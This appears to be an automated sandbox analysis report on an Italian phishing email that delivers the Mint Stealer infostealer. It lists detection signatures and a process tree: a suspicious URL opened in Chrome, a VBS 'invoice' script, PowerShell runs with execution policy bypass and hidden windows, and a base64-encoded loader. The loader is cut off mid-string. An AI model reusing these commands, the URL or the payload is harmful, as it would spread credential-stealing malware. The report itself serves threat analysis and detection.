Edit tour
Windows
Analysis Report
I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg
Overview
General Information
Detection
Mint Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Suricata IDS alerts for network traffic
Yara detected Mint Stealer
Yara detected Powershell decode and execute
AI detected potential phishing Email
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Office Autorun Keys Modification
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64_ra
- svchost.exe (PID: 7040 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- OUTLOOK.EXE (PID: 2952 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Root\Offi ce16\OUTLO OK.EXE" /f "C:\Users \user\Desk top\I_ Ult ima richie sta di pag amento fin ale per Cu zziol beve rage s_r_l __.msg" MD5: 91A5292942864110ED734005B7E005C0) - ai.exe (PID: 5668 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \root\vfs\ ProgramFil esCommonX6 4\Microsof t Shared\O ffice16\ai .exe" "E58 1CB4A-9BB8 -4348-8486 -140C3ED4F 7CF" "00D1 D5C8-8F94- 47CD-842C- 62D6A2C573 DE" "2952" "C:\Progr am Files ( x86)\Micro soft Offic e\Root\Off ice16\OUTL OOK.EXE" " WordCombin edFloatieL reOnline.o nnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD) - chrome.exe (PID: 6556 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// amdwind5xp tsm0uvj0ij bsfshyuy0n 4vze97vbh. livecasino tipuk.com/ EPsAIgNy0L MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - chrome.exe (PID: 7144 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2212 --fi eld-trial- handle=202 4,i,782907 9969028914 035,538796 1005425325 29,262144 --disable- features=O ptimizatio nGuideMode lDownloadi ng,Optimiz ationHints ,Optimizat ionHintsFe tching,Opt imizationT argetPredi ction /pre fetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - wscript.exe (PID: 8124 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\D ownloads\F attura8715 7159.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 5164 cmdline:
powershell -executio npolicy by pass -Wind owStyle hi dden -c "c md /q /cC: \Users\use r\AppData\ Roaming\1Q 5Mu4aI.bat " MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7304 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6732 cmdline:
"C:\Window s\system32 \cmd.exe" /q /cC:\Us ers\user\A ppData\Roa ming\1Q5Mu 4aI.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 1252 cmdline:
powershell -executio npolicy by pass -Wind owStyle hi dden -file "C:\Users \user\AppD ata\Roamin g\1Q5Mu4aI .ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 6228 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -Windo wStyle hid den -c "[S ystem.Text .Encoding] ::UTF8.Get String([Sy stem.Conve rt]::FromB ase64Strin g('JEVycm9 yQWN0aW9uU HJlZmVyZW5 jZSA9ICJDb 250aW51ZSI KCiR4VGN3a UNQOW15QWh lZ0NzU3lZd EdaeDlpNkk 5aHRtM1pXW kY0ZkVqdDN MVmdScVRIa jZhaDZpWUw 2ZUVqZ0Z0N XpoVjdwTWN XZDNtOHE4c kswWTd6cnN MViA9ICQoL WpvaW4gKCg 2NS4uOTApI CsgKDk3Li4 xMjIpIHwgR 2V0LVJhbmR vbSAtQ291b nQgNSB8ICU ge1tjaGFyX SRffSkpOwo kcWtxakh2Y nlBQzBzZmd leUp3MDB0c 1lMSElMWlp vT3djWkpLd UVvWXhmWWt LeWtSYW5pN WpaZ0trWU9 uSzdCYVlJc jFFYXg1d1B IdVhObzlFZ 0JiZFlUaU1 qY01HRiA9I FtpbnRdKEd ldC1EYXRlI C1Gb3JtYXQ gSEgpOwokb HBoRjBrVHp Gc1h4cWdEa mNVNThiQ0F xTWViSkZtT 3Q1N0FvZFB JS3NORnZOY 3J0bmdDM3l sY25oVWdHT jJhemExcVJ uQlprVTE4Y 0ZGZDUgPSB baW50XShHZ XQtRGF0ZSA tRm9ybWF0I G1tKTsKJGx waEYwa1R6R nNYeHFnRGp jVTU4YkNBc U1lYkpGbU9 0NTdBb2RQS UtzTkZ2TmN ydG5nQzN5b GNuaFVnR04 yYXphMXFSb kJaa1UxOGN GRmQ1QWRkI D0gMzsKSWY gKCRscGhGM GtUekZzWHh xZ0RqY1U1O GJDQXFNZWJ KRm1PdDU3Q W9kUElLc05 Gdk5jcnRuZ 0MzeWxjbmh VZ0dOMmF6Y TFxUm5CWmt VMThjRkZkN SArICRscGh GMGtUekZzW HhxZ0RqY1U 1OGJDQXFNZ WJKRm1PdDU 3QW9kUElLc 05Gdk5jcnR uZ0MzeWxjb mhVZ0dOMmF 6YTFxUm5CW mtVMThjRkZ kNUFkZCAtZ 3QgNTkpIHs KICAgICRxa 3FqSHZieUF DMHNmZ2V5S ncwMHRzWUx ISUxaWm9Pd 2NaSkt1RW9 ZeGZZa0t5a 1Jhbmk1alp nS2tZT25LN 0JhWUlyMUV heDV3UEh1W E5vOUVnQmJ kWVRpTWpjT UdGID0gJHF rcWpIdmJ5Q UMwc2ZnZXl KdzAwdHNZT EhJTFpab09 3Y1pKS3VFb 1l4ZllrS3l rUmFuaTVqW mdLa1lPbks 3QmFZSXIxR WF4NXdQSHV YTm85RWdCY mRZVGlNamN NR0YgKyAxO wogICAgJGx waEYwa1R6R nNYeHFnRGp jVTU4YkNBc U1lYkpGbU9 0NTdBb2RQS UtzTkZ2TmN ydG5nQzN5b GNuaFVnR04 yYXphMXFSb kJaa1UxOGN GRmQ1ID0gJ GxwaEYwa1R 6RnNYeHFnR GpjVTU4YkN BcU1lYkpGb U90NTdBb2R QSUtzTkZ2T mNydG5nQzN 5bGNuaFVnR 04yYXphMXF SbkJaa1UxO GNGRmQ1ICs gJGxwaEYwa 1R6RnNYeHF nRGpjVTU4Y kNBcU1lYkp GbU90NTdBb 2RQSUtzTkZ 2TmNydG5nQ zN5bGNuaFV nR04yYXphM XFSbkJaa1U xOGNGRmQ1Q WRkIC0gNjA 7Cn0gRWxzZ SB7CiAgICA kbHBoRjBrV HpGc1h4cWd EamNVNThiQ 0FxTWViSkZ tT3Q1N0FvZ FBJS3NORnZ OY3J0bmdDM 3lsY25oVWd HTjJhemExc VJuQlprVTE 4Y0ZGZDUgP SAkbHBoRjB rVHpGc1h4c WdEamNVNTh iQ0FxTWViS kZtT3Q1N0F vZFBJS3NOR nZOY3J0bmd DM3lsY25oV WdHTjJhemE xcVJuQlprV TE4Y0ZGZDU gKyAkbHBoR jBrVHpGc1h 4cWdEamNVN ThiQ0FxTWV iSkZtT3Q1N 0FvZFBJS3N ORnZOY3J0b mdDM3lsY25 oVWdHTjJhe mExcVJuQlp rVTE4Y0ZGZ DVBZGQ7Cn0 7CiRxa3FqS HZieUFDMHN mZ2V5SncwM HRzWUxISUx aWm9Pd2NaS kt1RW9ZeGZ Za0t5a1Jhb mk1alpnS2t ZT25LN0JhW UlyMUVheDV 3UEh1WE5vO UVnQmJkWVR pTWpjTUdGI D0gSWYgKFt pbnRdKEdld C1EYXRlIC1 Gb3JtYXQgS EgpICsgMSA tZ3QgMjMpI HsiMDAifSB FbHNlIHskc Wtxakh2Ynl BQzBzZmdle Up3MDB0c1l MSElMWlpvT 3djWkpLdUV vWXhmWWtLe WtSYW5pNWp aZ0trWU9uS zdCYVlJcjF FYXg1d1BId